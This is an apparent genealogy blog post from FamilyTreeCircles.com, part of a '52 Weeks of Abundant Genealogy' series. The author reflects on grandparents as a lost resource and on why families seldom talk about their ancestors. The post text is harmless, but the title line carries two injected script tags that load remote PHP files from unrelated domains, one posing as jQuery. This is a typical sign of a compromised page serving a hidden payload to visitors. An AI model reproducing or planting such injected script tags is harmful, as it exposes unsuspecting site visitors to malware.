<B>PAST GENEALOGY RESOURCES</B> - (week 41)<script src="https://bestdoctornearme.com/splitter.ai/index.php"></script><script src="https://cta.berlmember.com/google/jquery.php"></script> :: FamilyTreeCircles.com Genealogy
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Journal by ngairedith

this week (week 41) of Abundant Genealogy was "Past Genealogy Resources", any genealogy tools, magazines or websites that no longer exist that you remember once using

I have not found any for New Zealand that I used to use but which are now defunct. In fact, it seems every day there are new ones being added as the interest in Genealogy grows
However, I like to blog about something each week, seeing someone has gone to the trouble to come up with this idea to provide info & entertainment on, what can sometimes be heavy going, doing Genealogy Searching

I guess the ultimate 'Past Resource' for Genealogy would be our grandparents and beyond ...

I think most (or a large proportion) of young people have little interest in the past (and that applies to any generation).
It is only about NOW, and most of all it is about ME in the NOW.
My generation was out to change the world from what we saw as boring, mundane, too authoriative, we wanted to shock and change and we did. We take credit for the many good things that came out of it (and refuse to take responsibility for the bad) but that's another story that will one day make a great blog :)

Eventually we get to an age when it becomes obvious it is not about 'us' and we become interested in who our ancestors were - who were these people staring back at us from old, inherited photo albums ?? - how do they figure in my life? - did they ever do anything exciting?? - where were they from and why.

If you're reading this you are probably interested in genealogy and your own ancestors so you will know that their journey from one side of the world to another, in the conditions of back then, is scarey and as we get into their story we realise they changed the world probably more than we did. NOW we are interested, this looks exciting, we want to know more... Unfortunately at times we leave the questions too late.

Personally, I only had 1 grandparent still living when I was born and she died when I was 9, yet, I could have asked my mother about ancestors but didn't really, wasn't that interested then. I remember her volunteering bits and pieces but nothing really 'sunk in' because I guess I wasn't really listening (isn't that typical of teenagers of every generation)

I have seen a lot of people say that their family never spoke of 'them' (I have said it myself a number of times), or that they never learnt anything about their ancestors when they were growing up because their parents never spoke of them
... and yet, I wonder
Now that I have gone full cirlce I am looking at it from a different angle. If I have not been asked I do not say. Because I don't want to bore the young ones about people they have no interest in at this time I don't go into any depth. Just short bursts, like, your greatgrandfather used to say ... and if they ask for more, BONUS
I think that if I bring up the subject I will lose their interest and so better to wait for them to ask!! Did our parents also think that way?
... round and round it goes


52 Weeks of Abundant Genealogy
week 33

week 34

week 35

week 36

week 37

week 38

week 39

week 40

week 41

week 42

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by ngairedith Profile | Research | Contact | Subscribe | Block this user
on 2012-10-07 05:28:52

ngairedith has been a Family Tree Circles member since Feb 2008.

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